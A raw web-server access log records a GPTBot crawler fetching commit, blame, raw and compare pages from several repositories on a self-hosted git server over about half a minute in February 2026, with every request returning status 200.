200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429964] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" -[17/Feb/2026:14:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" -[17/Feb/2026:14:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 316206] [Gzip 14.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 288703] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" -[17/Feb/2026:14:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 13002] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets" [Client 74.7.227.38] [Length 29962] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 22220] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 11438] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" -[17/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main" [Client 74.7.227.38] [Length 12827] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:14:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages%2fbearing.png" [Client 74.7.227.38] [Length 19827] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" -[17/Feb/2026:14:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 22248] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:14:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages%2freactor.png" [Client 74.7.227.38] [Length 19830] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" -[17/Feb/2026:14:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2ftsconfig.json" [Client 74.7.227.38] [Length 23674] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" -[17/Feb/2026:14:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fpackage.json" [Client 74.7.227.38] [Length 23534] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" -[17/Feb/2026:14:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12785] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" -[17/Feb/2026:14:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fmetadata.json" [Client 74.7.227.38] [Length 22934] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" -[17/Feb/2026:14:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 27965] [Gzip 6.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" -[17/Feb/2026:14:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72691] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:14:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72651] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:14:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json?display=source" [Client 74.7.227.38] [Length 11274] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:14:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" [Client 74.7.227.38] [Length 11449] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:14:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" [Client 74.7.227.38] [Length 11443] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:14:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts?display=source" [Client 74.7.227.38] [Length 11502] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" -[17/Feb/2026:14:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" -[17/Feb/2026:14:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" -[17/Feb/2026:14:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts?display=source" [Client 74.7.227.38] [Length 11503] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" -[17/Feb/2026:14:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11476] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" -[17/Feb/2026:14:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" -[17/Feb/2026:14:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" -[17/Feb/2026:14:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" [Client 74.7.227.38] [Length 14216] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" -[17/Feb/2026:14:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 74.7.227.38] [Length 14236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" -[17/Feb/2026:14:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 14390] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" -[17/Feb/2026:14:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 14389] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" -[17/Feb/2026:14:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 13000] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" -[17/Feb/2026:14:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 12999] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" -[17/Feb/2026:14:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" [Client 74.7.227.38] [Length 9852] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" -[17/Feb/2026:14:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" [Client 74.7.227.38] [Length 9852] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" -[17/Feb/2026:14:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11897] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" -[17/Feb/2026:14:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" -[17/Feb/2026:14:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 74.7.227.38] [Length 11043] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" -[17/Feb/2026:14:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11648] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11647] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" -[17/Feb/2026:14:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" -[17/Feb/2026:14:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 